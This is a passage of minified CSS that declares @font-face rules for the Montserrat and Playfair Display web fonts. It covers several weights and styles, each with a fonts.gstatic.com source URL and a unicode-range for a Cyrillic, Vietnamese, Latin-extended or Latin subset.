U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dR9pA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dR9pA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTh89Y.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTh89Y.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTh89Y.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTh89Y.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTh89Y.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTh89Y.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTh89Y.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTh89Y.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTh89Y.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7yRZrPA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7yRZrPA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7yRZrPA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 700;font-display: 